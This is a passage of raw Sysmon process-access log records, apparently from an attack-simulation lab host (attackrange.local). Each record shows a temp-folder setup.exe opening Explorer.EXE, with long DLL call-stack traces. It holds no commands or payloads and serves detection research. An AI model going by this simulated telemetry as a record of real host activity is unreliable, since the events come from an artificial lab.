dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(